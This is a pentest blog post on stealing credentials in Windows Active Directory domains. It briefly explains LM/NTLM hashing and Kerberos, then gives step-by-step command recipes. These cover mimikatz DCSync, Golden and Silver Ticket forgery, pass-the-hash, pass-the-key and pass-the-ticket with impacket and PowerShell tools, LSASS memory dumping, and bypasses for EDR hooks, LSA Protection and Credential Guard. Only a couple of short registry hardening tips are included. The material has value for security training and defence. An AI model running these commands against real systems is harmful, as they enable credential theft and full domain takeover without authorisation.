
<!DOCTYPE html>
<html lang="default" class="loading">
<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>About Stealing Credentials - TyeYeah&#39;s blog</title>
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate">
    <meta name="keywords" content="TyeYeah, CS,"> 
    <meta name="description" content="blog on Hexo,This part we discuss about how to steal credentials in Domain pentest.
Basic KnowledgeBefore runnin,"> 
    <meta name="author" content="TyeYeah"> 
    <link rel="alternative" href="atom.xml" title="TyeYeah&#39;s blog" type="application/atom+xml"> 
    <link rel="icon" href="/img/favicon.png"> 
    
    <link rel="stylesheet" href="/css/diaspora.css">
	<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    <script>
         (adsbygoogle = window.adsbygoogle || []).push({
              google_ad_client: "ca-pub-8691406134231910",
              enable_page_level_ads: true
         });
    </script>
    <script async custom-element="amp-auto-ads" src="https://cdn.ampproject.org/v0/amp-auto-ads-0.1.js">
    </script>
</head>
</html>
<body class="loading">
    <span id="config-title" style="display:none">TyeYeah&#39;s blog</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="iconfont icon-home image-icon" href="javascript:;" data-url="../../../.."></a>
    <div title="Play/Stop" class="iconfont icon-play"></div>
    <h3 class="subtitle">About Stealing Credentials</h3>
    <div class="social">
        <div>
            <div class="share">
                <a title="QR Code" class="iconfont icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class="main">
        <h1 class="title">About Stealing Credentials</h1>
        <div class="stuff">
            <span>May 25, 2020</span>
            
  <ul class="post-tags-list"><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/domain/">domain</a></li><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/pentest/">pentest</a></li><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/windows/">windows</a></li></ul>


        </div>
        <div class="content markdown">
            <p>This part we discuss about how to steal credentials in <code>Domain</code> pentest.</p>
<h2 id="Basic-Knowledge"><a href="#Basic-Knowledge" class="headerlink" title="Basic Knowledge"></a>Basic Knowledge</h2><p>Before running powerfull tools, we have many concepts to know, like policies of storing passwords.. </p>
<h3 id="NTLM-Protocol"><a href="#NTLM-Protocol" class="headerlink" title="NTLM Protocol"></a>NTLM Protocol</h3><p>In <code>Workgroup</code>, password hashes are saves in local <code>SAM</code> file in <code>%SystemRoot%\system32\config\sam</code>; in <code>Domain</code>, they are saved in file <code>ntds.dit</code> in <code>%SystemRoot%\NTDS</code> of <code>Domain Controllers</code>. Hashes have a format of: USERNAME:SID:LM-Hash:NT-Hash, like: <code>Administrator:500:aad3b435b51404eeaad3b435b51404ee:32057716c8bd0647d9197a9db0b041eb:::</code></p>
<h4 id="LM-Hash"><a href="#LM-Hash" class="headerlink" title="LM Hash"></a>LM Hash</h4><p><code>LM Hash</code> (LAN Manager Hash) is a way of hash.<br>It converts all letters to uppercase, then converts them to <code>hex</code>. If binary has less than 14 bytes, <code>0</code> needs to add to complete 14 bytes.<br>Then it seperates these 14 bytes into 2 parts, 7 bytes every part, and we add one <code>0</code> at each end.<br>Here we have a magic string: <code>KGS!@#$%</code>. We use it as the key, to do DES encryption for these 2 parts (8 bytes for each). Finally we get <code>LM Hash</code>.</p>
<h4 id="NTLM-Hash"><a href="#NTLM-Hash" class="headerlink" title="NTLM Hash"></a>NTLM Hash</h4><p>Since Windows Vista, passwords are defaultly stored as <code>NTLM Hash</code>, not <code>LM Hash</code>.<br><code>NTLM Hash</code> firstly converts password to <code>hex</code>, then to <code>unicode</code>, and finally <code>MD4</code> hash.</p>
<h4 id="NTLM-Authentication"><a href="#NTLM-Authentication" class="headerlink" title="NTLM Authentication"></a>NTLM Authentication</h4><p><img src="/imghost/asc/1.png" alt="NTLM Authentication"></p>
<ol>
<li>Client inputs username &amp; password, then request by sending plain text username to Server.</li>
<li>Server receives request, and sends a random 16 bits (8 bits for NTLM v1, 16bits for NTLM v2) <code>challenge</code> number. Get it hashed by stored <code>NTLM Hash</code>, and saves as <code>challenge1</code>.</li>
<li>Client receives <code>challenge</code>, and hashes it using local password hash as response (<code>challenge2</code>).</li>
<li>Server receives response, compares <code>challenge1</code> and <code>challenge2</code> to auth.<h3 id="Kerberos-Protocol"><a href="#Kerberos-Protocol" class="headerlink" title="Kerberos Protocol"></a>Kerberos Protocol</h3><code>Kerberos</code> is a network auth protocol used in <code>Domain</code>, and it serves for C/S programs.<br>There are there roles in the <code>Kerberos</code> protocol:</li>
</ol>
<ul>
<li>Client</li>
<li>Server</li>
<li>KDC<ul>
<li>AS: check Client.</li>
<li>TGS: generate ST (Silver TGS Ticket) for Client to access some server.</li>
</ul>
</li>
</ul>
<p><img src="/imghost/asc/2.png" alt="Kerberos"></p>
<ol>
<li>Client sends a auth request (<code>KRB_AS_REQ</code>) to KDC (<code>AS</code>), with a time stamp encrypted by Client hash. AS receives request and decrypts time stamp with hash in Server side, if it is in a certain time range, means successful authentication.</li>
<li><code>AS</code> checks if user exists in database, then decrypts data with Client hash. If successful, return the TGT (Ticket Granting Ticket) Ticket (<code>Golden Ticket</code>) encrypted by <code>krbtgt</code> (special user, service account in KDC) password hash, and a session key (<code>sessionkey1</code>), which is randomly generated by KDC, and encrypted by Client <code>NTLM hash</code> as <code>KRB_AS_REP</code>. Client cannot decrypt TGT Ticket, but with <code>krbtgt</code> hash we can forge a <code>Golden Ticket</code></li>
<li>Client decrypts <code>sessionkey1</code>, using own password. Client uses decrypted <code>sessionkey1</code> to encrypt time stamp, then sends them all to TGS for ticket to access Server (<code>KRB_TGS_REQ</code>).</li>
<li>TGS receives request, and check whether the Service that Client access is valid. If successful, KDC decrypts <code>Golden Ticket</code> with <code>krbtgt</code> password hash, to see time stamp in it. If <code>Golden Ticket</code> is still valid, return session key encrypted by <code>sessionkey1</code>, and a ticket to Client (<code>KRB_TGS_REP</code>). In TGS response, ticket is encrypted with Server hash, so if we have Server hash, we can forge a <code>Silver Ticket</code>.</li>
<li>Client decrypts <code>sessionkey1</code> as session key (<code>sessionkey2</code>), then uses it to encrypt time stamp and ticket (<code>KRB_AP_REQ</code>), finally sends to Server.</li>
<li>Server decrypts ticket using own hash to get <code>sessionkey2</code>. Use <code>sessionkey2</code> to decrypt time stamp. After that Server uses PAC to ask KDC whether Client is able to access. <code>Domain Controller</code> decrypt PAC to let Client know whether it’s the right Server.</li>
</ol>
<p>All Kerberos tickets are stored in <code>LSASS</code> process in memory.</p>
<h3 id="Golden-Ticket"><a href="#Golden-Ticket" class="headerlink" title="Golden Ticket"></a>Golden Ticket</h3><p>It appears in Step.2 of <code>Kerberos</code> protocol, which is the TGT Ticket(20 mins valid), delivered to Client by AS. It is encrypted by <code>krbtgt</code> password hash which is normally unchanged, so if <code>Domain Controller</code> changes password, we can still forge a <code>Golden Ticket</code> to control.</p>
<p>A <code>Golden Ticket</code> consists of <code>Domain Name</code>, <code>Domain SID</code>, <code>krbtgt</code> password hash, and forged username. We can use <code>mimikatz</code>, <code>cobaltstrike</code> and <code>metasploit</code> to do forgery.</p>
<h4 id="Mimikatz"><a href="#Mimikatz" class="headerlink" title="Mimikatz"></a>Mimikatz</h4><p>Export <code>krbtgt</code> password hash (aes256_hmac).<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mimikatz # privilege::debug      </span><br><span class="line">mimikatz # lsadump::dcsync /domain:domain_name /user:krbtgt</span><br></pre></td></tr></table></figure></p>
<p>Then get <code>Domain SID</code> (SID without the <code>-number</code> at the end)<br><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&gt; whoami /all</span><br></pre></td></tr></table></figure></p>
<p>Forge <code>Golden Ticket</code><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz # kerberos::golden /domain:domain_name /sid:S-1-5-21-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxxxx /aes256:krbtgt_password_hash /user:user_name /ticket:gold.kirbi</span><br></pre></td></tr></table></figure></p>
<p>Finally import ticket.<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kerberos::ptt c:\Users\your_user_name\gold.kirbi</span><br></pre></td></tr></table></figure></p>
<p>Another way is (using rc4_plain)<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kerberos::golden /domain:domain_name /sid:S-<span class="number">1</span>-<span class="number">5</span>-<span class="number">21</span>-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxxxx /rc4:krbtgt_password_hash /user:user_name /ptt</span><br></pre></td></tr></table></figure></p>
<h4 id="CobaltStrike"><a href="#CobaltStrike" class="headerlink" title="CobaltStrike"></a>CobaltStrike</h4><p>After one beacon is online -&gt; Execute -&gt; Golden Ticket </p>
<h4 id="Metasploit"><a href="#Metasploit" class="headerlink" title="Metasploit"></a>Metasploit</h4><p>In the metepreter, frst load module.<br><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; load kiwi</span><br></pre></td></tr></table></figure></p>
<p>Generate Golden Ticket.<br><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; golden_ticket_create -d domain_name -k krbtgt_password_hash -s S-1-5-21-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxxxx -u user_name -t /tmp/golden.ticket</span><br></pre></td></tr></table></figure></p>
<p>Import into memory<br><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; kerberos_ticket_use /tmp/golden.ticket</span><br></pre></td></tr></table></figure></p>
<h3 id="Silver-Ticket"><a href="#Silver-Ticket" class="headerlink" title="Silver Ticket"></a>Silver Ticket</h3><p>It is ST that TGS delivers to Client in Step.4 and Step.5 of <code>Kerberos</code> protocol. Server will decrypt Client with Client hash, so this process doesn’t go via kDC, but <code>Silver Ticket</code> can be only used for once.</p>
<p>A <code>Silver Ticket</code> consists of <code>Domain Name</code>, <code>Domain SID</code>, <code>Domain</code> Service <code>NTLM hash</code>, forged username, and target <code>Kerberos</code> service.<br>Common services like:</p>
<table>
<thead>
<tr>
<th>Service Note</th>
<th>Service Name</th>
</tr>
</thead>
<tbody>
<tr>
<td>WMI</td>
<td>HOST, RPCSS</td>
</tr>
<tr>
<td>Powershell Remoting</td>
<td>HOST, HTTP</td>
</tr>
<tr>
<td>WinRM</td>
<td>HOST, HTTP</td>
</tr>
<tr>
<td>Scheduled Tasks</td>
<td>Host</td>
</tr>
<tr>
<td>LADP, DCSync</td>
<td>LDAP</td>
</tr>
<tr>
<td>Windows File Share</td>
<td>CIFS</td>
</tr>
<tr>
<td>Windows Remote Server AdministrationTools</td>
<td>RPCSS, LDAP, CIFS</td>
</tr>
</tbody>
</table>
<p>Forge the <code>Silver Ticket</code><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz # kerberos::golden /domain:domain_name /sid:S-1-5-21-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxxxx /target:domain_target_member /service:cifs /rc4:krbtgt_password_hash /user:user_name /ptt</span><br></pre></td></tr></table></figure></p>
<p>To defend this, add <code>ValidateKdcPacSignature</code> with value <code>1</code>.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters</span><br></pre></td></tr></table></figure></p>
<h3 id="Other-Methods-to-Abuse-Kerberos"><a href="#Other-Methods-to-Abuse-Kerberos" class="headerlink" title="Other Methods to Abuse Kerberos"></a>Other Methods to Abuse Kerberos</h3><p>Other than <code>Golden Ticket</code> Attack and <code>Silver Ticket</code> Attack, there are <a href="https://www.hackingarticles.in/kerberos-brute-force-attack/" target="_blank" rel="noopener">Kerberos Brute Force Attack</a>, <a href="https://www.hackingarticles.in/deep-dive-into-kerberoasting-attack/" target="_blank" rel="noopener">Kerberoasting</a>, and <a href="https://www.hackingarticles.in/as-rep-roasting/" target="_blank" rel="noopener">AS-REP Roasting</a> …</p>
<h3 id="Pass-The-Hash"><a href="#Pass-The-Hash" class="headerlink" title="Pass The Hash"></a>Pass The Hash</h3><p>“Pass the hash” (<code>PTH</code>) allows attackers to authenticate by using the underlying NTLM or LanMan hash of a user’s password, instead of requiring the associated plaintext password as is normally the case. </p>
<p>Hash can be devided into <code>LM Hash</code> and <code>NTLM Hash</code> which mentioned <a href="#NTLM-Protocol">before</a>. If length of password goes beyond 15, <code>LM Hash</code> will not be generated, and it has been disabled since Windows Vista and Windows Server 2008, so most of the time we try to capture <code>NTLM hash</code> for <code>PTH</code>.</p>
<p>The <code>PTH</code> pentest is:</p>
<ol>
<li>Controll a <code>Domain</code> Member.</li>
<li>Dump user password hash.</li>
<li>Use <code>PTH</code> to log in to other pc and keep on dumping hashes.</li>
<li>Keep searching hash of <code>Domain Controller</code>, then take over the <code>Domain</code>.</li>
</ol>
<h4 id="Capture-NTLM-Hash"><a href="#Capture-NTLM-Hash" class="headerlink" title="Capture NTLM Hash"></a>Capture <code>NTLM Hash</code></h4><p><code>NTLM</code>(NT LAN Manager) is the only successor of <code>LM</code> (LAN Manager), and it adds a Challenge-Response verification mechanism which was introduced <a href="#NTML-Hash">here</a>.</p>
<p>For <code>NTLM</code> we also have <code>NTLM Hash</code> and <code>Net-NTLM Hash</code>.<br><code>NTLM Hash</code> is stored in local <code>SAM</code> (Security Account Manager) file, so you can use <code>mimikatz</code> to extract from <code>SAM</code> or <code>NTDS.dit</code> of <code>Domian Controller</code>.<br><code>Net-NTLM Hash</code> is in the response of Challenge-Response verification. A popular util <a href="https://github.com/lgandx/Responder" target="_blank" rel="noopener">Responder</a> is borned for this (and <a href="https://github.com/Kevin-Robertson/Inveigh" target="_blank" rel="noopener">Inveigh</a> in <code>Powershell</code>.)<br>After acquiring the hash, use <a href="https://github.com/hashcat/hashcat.git" target="_blank" rel="noopener"><code>hashcat</code></a> to brute force using dictionaries, or just pass the hash to login.</p>
<h4 id="PTH-Tools"><a href="#PTH-Tools" class="headerlink" title="PTH Tools"></a><code>PTH</code> Tools</h4><p>On <code>Kali</code>, we have <code>meterpreter</code> and some other tools sets, like <code>exploit/windows/smb/psexec</code> module in <code>msf</code>.</p>
<p>In Python library <code>impacket</code>, we have <a href="https://raw.githubusercontent.com/SecureAuthCorp/impacket/0b46f198042626a1ecd2846d22db355453e29c03/examples/smbexec.py" target="_blank" rel="noopener">smbexec</a>:<br><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">python smbexec.py -<span class="built_in">hash</span> LM-Hash:NT-Hash user_name@target_ip</span><br><span class="line">or</span><br><span class="line">python smbexec.py -hashes :NT-Hash user_name@target_ip <span class="comment"># no need for LM-Hash</span></span><br></pre></td></tr></table></figure></p>
<p>On Windows we have <a href="https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py" target="_blank" rel="noopener"><code>wmiexec.py</code></a> and <a href="https://github.com/maaaaz/impacket-examples-windows" target="_blank" rel="noopener">exe version</a>.<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&gt; wmiexec -hashes <span class="number">00000000000000000000000000000000</span>:<span class="number">7</span>ECFFFF0C3548187607A14BAD0F88BB1 TEST/test1@<span class="number">192.168</span>.<span class="number">1.1</span> <span class="string">"whoami"</span></span><br></pre></td></tr></table></figure></p>
<p>Parameter <code>hashes</code> goes like: <code>LM-HASH:NTLM-HASH</code>.</p>
<p>We also have powerful <a href="https://github.com/Kevin-Robertson/Invoke-TheHash/" target="_blank" rel="noopener"><code>Powershell</code> Tools</a>.<br><code>Invoke-WMIExec</code> is like <code>wmiexec.py</code><br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&gt; Invoke-WMIExec -Target target_ip -Domain domain_name -Username user_name -Hash ntlm_hash -Command <span class="string">"calc.exe"</span> -verbose</span><br></pre></td></tr></table></figure></p>
<p><code>Invoke-SMBExec</code> using <code>system</code> privilege to execute on target.<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&gt; Invoke-SMBExec -Target target_ip -Domain domain_name -Username user_name -Hash ntlm_hash -Command <span class="string">"calc.exe"</span> -verbose</span><br></pre></td></tr></table></figure></p>
<h4 id="Pass-The-Key"><a href="#Pass-The-Key" class="headerlink" title="Pass The Key"></a>Pass The Key</h4><p>We should get:</p>
<ul>
<li>Username</li>
<li><code>Domain Name</code></li>
<li><code>NTLM Hash</code></li>
</ul>
<p>Use <code>mimikatz</code>:<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&gt; mimikatz <span class="string">"privilege::debug"</span> <span class="string">"sekurlsa::pth /user:user_name /domain:domain_name /ntlm: ntlm_hash"</span></span><br></pre></td></tr></table></figure></p>
<p>A cmd will pop up.<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&gt; dir \\target_ip\c$</span><br></pre></td></tr></table></figure></p>
<p>It’ll be successful.</p>
<p>Actually <code>sekurlsa::pth</code> in <code>mimikatz</code> is called <code>Overpass-the-Hash</code>, aka <code>Pass-the-Key</code>.</p>
<p>Note: “ntlm hash is mandatory on XP/2003/Vista/2008 and before 7/2008r2/8/2012 kb2871997 (AES not available or replaceable) ; AES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with kb2871997, in this case you can avoid ntlm hash.”<br>Which means we can also conduct <code>PTH</code> with AES keys, if <code>kb2871997</code> is patched/installed.</p>
<p>Still in <code>mimikatz</code>:<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&gt; mimikatz <span class="string">"privilege::debug"</span> <span class="string">"sekurlsa::pth /user:user_name /domain:domain_name /aes256: aes256_hmac"</span></span><br></pre></td></tr></table></figure></p>
<h4 id="Pass-The-Ticket"><a href="#Pass-The-Ticket" class="headerlink" title="Pass The Ticket"></a>Pass The Ticket</h4><p>Because <code>PTH</code> of <code>mimikatz</code> needs privilege as Admin, <code>mimikatz</code> provides another way that dont need – <code>Pass-the-Ticket</code>. It requires a open source util: <a href="https://github.com/gentilkiwi/kekeo" target="_blank" rel="noopener"><code>kekeo</code></a>.<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&gt; kekeo <span class="string">"tgt::ask /user:user_name /domain:domain_name /ntlm:ntlm_hash"</span></span><br></pre></td></tr></table></figure></p>
<p>Then it generates a ticket, we import it.<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&gt; kekeo <span class="string">"kerberos::ptt TGT_xx@xxx_krbtgt~xxx@xxx.xxxx"</span></span><br></pre></td></tr></table></figure></p>
<h4 id="Related"><a href="#Related" class="headerlink" title="Related"></a>Related</h4><p><a href="https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Pass-the-Hash-with-Remote-Desktop(Restricted-Admin-mode" target="_blank" rel="noopener">Pass the Hash with Remote Desktop (Restricted Admin mode)</a>/) and <a href="https://www.4hou.com/posts/1QWo" target="_blank" rel="noopener">Pass the Hash with Remote Desktop Protocol</a></p>
<h2 id="Steal-Credentials"><a href="#Steal-Credentials" class="headerlink" title="Steal Credentials"></a>Steal Credentials</h2><p>Credentials can be plain text password, or password hash. With either of them, login and controlling target will be easier.</p>
<h3 id="From-lsass-exe-Process"><a href="#From-lsass-exe-Process" class="headerlink" title="From lsass.exe Process"></a>From <code>lsass.exe</code> Process</h3><p>As I mentioned, all Kerberos tickets are stored in <code>LSASS</code> process in memory.</p>
<h4 id="Normal-Ways"><a href="#Normal-Ways" class="headerlink" title="Normal Ways"></a>Normal Ways</h4><p>Use <code>mimikatz</code> (will be detected)<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz.exe log <span class="string">"privilege::debug"</span> <span class="string">"sekurlsa::logonPasswords full"</span> <span class="keyword">exit</span></span><br></pre></td></tr></table></figure></p>
<p>Or dump memory and export credentials. For example, <code>procdump</code><br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&gt; procdump64.exe -accepteula -ma lsass.exe lsass.dmp</span><br></pre></td></tr></table></figure></p>
<p>Other tools like <a href="https://github.com/killswitch-GUI/minidump-lib" target="_blank" rel="noopener">minidump-lib</a> in C++, <a href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1" target="_blank" rel="noopener">Out-Minidump.ps1</a> in Powershell, and <a href="https://github.com/GhostPack/SharpDump" target="_blank" rel="noopener">SharpDump</a> in C#.<br><code>comsvcs.dll</code> can also be used, but it needs <code>SeDebugPrivilege</code> privilege, so only in Powershell as Administrator will this privilege status be <code>Enable</code>(even cmd as Administrator has it <code>Disabled</code>).<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&gt; powershell -c <span class="string">"rundll32 C:\windows\system32\comsvcs.dll, MiniDump 808 C:\test\lsass.dmp full"</span></span><br></pre></td></tr></table></figure></p>
<p>Actually all above are using API <code>MiniDumpWriteDump()</code> to get process dump, and some antivirus softwares start to block it by API hook (edit 5 bytes at the start of <code>NtReadVirtualMemory()</code>). We can fix that 5 bytes, and rewrite <code>NtReadVirtualMemory()</code>. See <a href="https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6" target="_blank" rel="noopener">Bypass EDR’s memory protection, introduction to hooking</a> and the tool – <a href="https://github.com/outflanknl/Dumpert" target="_blank" rel="noopener">Dumpert</a>.</p>
<p>After dumping, use <code>mimikatz</code> to export credentials.<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz.exe log <span class="string">"sekurlsa::minidump lsass.dmp"</span> <span class="string">"sekurlsa::logonPasswords full"</span> <span class="keyword">exit</span></span><br></pre></td></tr></table></figure></p>
<h4 id="Limited-Upload-Length"><a href="#Limited-Upload-Length" class="headerlink" title="Limited Upload Length"></a>Limited Upload Length</h4><p>Based on <a href="https://github.com/re4lity/subTee-gits-backups/blob/master/PELoader.cs" target="_blank" rel="noopener">PELoader.cs</a>, a newer <code>mimikatz</code> was packed in <a href="https://github.com/3gstudent/Homework-of-C-Sharp/blob/master/PELoaderofMimikatz.cs" target="_blank" rel="noopener">PELoaderofMimikatz.cs</a>. They load a compressed <code>mimikatz</code> whiling running.<br>Use <code>csc.exe</code> to compile<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&gt; C:\Windows\Microsoft.NET\Framework64\v3.<span class="number">5</span>\csc.exe PELoaderofMimikatz.cs /unsafe</span><br><span class="line"><span class="comment">#or</span></span><br><span class="line">&gt; C:\Windows\Microsoft.NET\Framework64\v4.<span class="number">0.30319</span>\csc.exe PELoaderofMimikatz.cs /unsafe</span><br></pre></td></tr></table></figure></p>
<p>Export credentials<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">PELoaderofMimikatz.exe log <span class="string">"privilege::debug"</span> <span class="string">"sekurlsa::logonPasswords full"</span> <span class="keyword">exit</span></span><br></pre></td></tr></table></figure></p>
<p>Or add commands first (compile as PELoaderofMimikatzAuto.exe), then use <code>InstallUtil.exe</code> to export credentials.<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&gt; C:\Windows\Microsoft.NET\Framework64\v4.<span class="number">0.30319</span>\InstallUtil.exe /logfile= /LogToConsole=false /U PELoaderofMimikatzAuto.exe</span><br></pre></td></tr></table></figure></p>
<p><a href="https://github.com/3gstudent/Homework-of-C-Sharp/blob/master/DumpLsass.cs" target="_blank" rel="noopener">DumpLsass.cs</a> will create <code>lsass.exe</code> dump file in the current dir after running, needs to compile by <code>csc.exe</code>. </p>
<h4 id="Limited-Download-Length"><a href="#Limited-Download-Length" class="headerlink" title="Limited Download Length"></a>Limited Download Length</h4><p>Sometime we cannot download big dump file that easily, so we export credentials on target, and download the credentials.<br>We have <a href="https://github.com/3gstudent/Homework-of-C-Sharp/blob/master/SafetyKatz.cs" target="_blank" rel="noopener">SafetyKatz</a>.<br>Compile it.<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&gt; C:\Windows\Microsoft.NET\Framework64\v3.<span class="number">5</span>\csc.exe SafetyKatz.cs /unsafe</span><br><span class="line"><span class="comment">#or</span></span><br><span class="line">&gt; C:\Windows\Microsoft.NET\Framework64\v4.<span class="number">0.30319</span>\csc.exe SafetyKatz.cs /unsafe</span><br></pre></td></tr></table></figure></p>
<h4 id="LSA-Protection"><a href="#LSA-Protection" class="headerlink" title="LSA Protection"></a>LSA Protection</h4><p>Microsoft added <code>LSA protection</code> policy on March 12, 2014 to prevent injection to <code>lsass.exe</code>. Add a DWORD(32) <code>RunAsPPL</code> with value <code>00000001</code><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa</span><br></pre></td></tr></table></figure></p>
<p>To bypass it, we can read <code>SAM</code> on disk.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">mimikatz # privilege::debug</span><br><span class="line">mimikatz # token::whoami</span><br><span class="line">mimikatz # token::elevate</span><br><span class="line">mimikatz # lsadump::sam</span><br></pre></td></tr></table></figure></p>
<p><code>mimikatz</code> also use <code>mimidrv.sys</code><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mimikatz # privilege::debug</span><br><span class="line">mimikatz # !+</span><br><span class="line">mimikatz # !processprotect /process:lsass.exe /remove</span><br></pre></td></tr></table></figure></p>
<h4 id="Credential-Guard"><a href="#Credential-Guard" class="headerlink" title="Credential Guard"></a>Credential Guard</h4><p>on Windows 10 and Windows Server 2016, Microsoft implements <code>Credential Guard</code>, which is based on virtualization technology and isolating the <code>lsass</code> process to protect credentials. With <code>Credential Guard</code>, lsass consists of two process: normal LSA ,and isolated LSA that running in VM.<br>Reading <code>SAM</code> on disk still bypass.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">mimikatz # privilege::debug</span><br><span class="line">mimikatz # token::whoami</span><br><span class="line">mimikatz # token::elevate</span><br><span class="line">mimikatz # lsadump::sam</span><br></pre></td></tr></table></figure></p>
<p>Or using <code>SSP</code> which is the software called when user logs, and receives user credentials. <code>SSP</code> will be loaded in <code>lsass.exe</code> process after system booting.<br><code>mimikatz</code> can install custom <code>SSP</code> through memory, edit <code>lsass</code> memory and extract credentials in it.<br>After executing <code>misc::memssp</code> in <code>mimikatz</code>, if some user login, <code>mimilsa.log</code> ,with user plain password in it, will be created in <code>c:\windows\system32</code><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mimikatz # privilege::debug</span><br><span class="line">mimikatz # misc::memssp</span><br></pre></td></tr></table></figure></p>
<p>Note:<br>Despite that, try <code>lsadump::secrets</code> to get <code>syskey</code> in the registry to decrypt. <code>PwDump7</code>, <code>QuarksPwDump</code> and other tools are also useful to bypass LSA Protection and Credential Guard.<br>If cmd, regedit and taskmgr are also disabled, <code>mimikatz</code> can still get over it.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">mimikatz # privilege::debug</span><br><span class="line">mimikatz # misc::cmd</span><br><span class="line">mimikatz # misc::regedit</span><br><span class="line">mimikatz # misc::taskmgr</span><br></pre></td></tr></table></figure></p>
